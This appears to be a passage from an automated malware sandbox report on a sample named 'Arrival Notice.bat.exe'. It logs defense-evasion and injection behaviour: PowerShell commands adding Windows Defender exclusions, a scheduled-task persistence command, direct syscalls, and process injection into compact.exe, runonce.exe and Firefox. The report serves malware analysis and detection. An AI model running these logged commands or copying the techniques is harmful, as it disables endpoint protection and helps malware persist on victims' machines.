              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe"
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dLrZsz.exe"
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dLrZsz.exe"Jump to behavior
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtWriteVirtualMemory: Direct from: 0x76F0490C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtOpenKeyEx: Direct from: 0x76F03C9C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtClose: Direct from: 0x76F02B6C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtReadVirtualMemory: Direct from: 0x76F02E8C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtCreateKey: Direct from: 0x76F02C6C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtSetInformationThread: Direct from: 0x76F02B4C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtQueryAttributesFile: Direct from: 0x76F02E6C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtAllocateVirtualMemory: Direct from: 0x76F048EC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtQuerySystemInformation: Direct from: 0x76F048CC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtOpenSection: Direct from: 0x76F02E0C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtDeviceIoControlFile: Direct from: 0x76F02AEC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtQueryValueKey: Direct from: 0x76F02BEC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtCreateFile: Direct from: 0x76F02FEC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtOpenFile: Direct from: 0x76F02DCC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtSetInformationThread: Direct from: 0x76F02ECC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtQueryInformationToken: Direct from: 0x76F02CAC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2E
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtTerminateThread: Direct from: 0x76F02FCC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtOpenKeyEx: Direct from: 0x76F02B9C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtProtectVirtualMemory: Direct from: 0x76F02F9C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtSetInformationProcess: Direct from: 0x76F02C5C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtNotifyChangeKey: Direct from: 0x76F03C2C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtCreateMutant: Direct from: 0x76F035CC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtWriteVirtualMemory: Direct from: 0x76F02E3C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtMapViewOfSection: Direct from: 0x76F02D1C
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtResumeThread: Direct from: 0x76F036AC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtReadFile: Direct from: 0x76F02ADC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtQuerySystemInformation: Direct from: 0x76F02DFC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtDelayExecution: Direct from: 0x76F02DDC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtQueryInformationProcess: Direct from: 0x76F02C26
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtResumeThread: Direct from: 0x76F02FBC
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeNtCreateUserProcess: Direct from: 0x76F0371C
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeMemory written: C:\Users\user\Desktop\Arrival Notice.bat.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeMemory written: C:\Users\user\AppData\Local\Temp\-6qxw.exe base: 400000 value starts with: 4D5A
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: NULL target: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: NULL target: C:\Windows\SysWOW64\compact.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: NULL target: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe protection: read write
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: NULL target: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: NULL target: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe protection: execute and read and write
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\-6qxw.exe protection: execute and read and write
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: NULL target: C:\Windows\SysWOW64\runonce.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe protection: read write
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Windows\SysWOW64\compact.exeThread register set: target process: 7332
              Source: C:\Windows\SysWOW64\runonce.exeThread register set: target process: 7668
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\compact.exeThread APC queued: target process: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dLrZsz.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess created: C:\Users\user\Desktop\Arrival Notice.bat.exe "C:\Users\user\Desktop\Arrival Notice.bat.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmpEFDB.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess created: C:\Users\user\AppData\Roaming\dLrZsz.exe "C:\Users\user\AppData\Roaming\dLrZsz.exe"Jump to behavior
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeProcess created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"
              Source: C:\Windows\SysWOW64\compact.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Windows\SysWOW64\compact.exeProcess created: C:\Users\user\AppData\Local\Temp\-6qxw.exe "C:\Users\user\AppData\Local\Temp\-6qxw.exe"
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess created: C:\Users\user\AppData\Local\Temp\-6qxw.exe "C:\Users\user\AppData\Local\Temp\-6qxw.exe"
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess created: C:\Users\user\AppData\Local\Temp\-6qxw.exe "C:\Users\user\AppData\Local\Temp\-6qxw.exe"
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
              Source: C:\Windows\SysWOW64\runonce.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000000.1929503546.0000000001A10000.00000002.00000001.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000002.4144884393.0000000001A10000.00000002.00000001.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4144945402.0000000001930000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000000.1929503546.0000000001A10000.00000002.00000001.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000002.4144884393.0000000001A10000.00000002.00000001.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4144945402.0000000001930000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000000.1929503546.0000000001A10000.00000002.00000001.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000002.4144884393.0000000001A10000.00000002.00000001.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4144945402.0000000001930000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000000.1929503546.0000000001A10000.00000002.00000001.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000002.4144884393.0000000001A10000.00000002.00000001.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4144945402.0000000001930000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Users\user\Desktop\Arrival Notice.bat.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
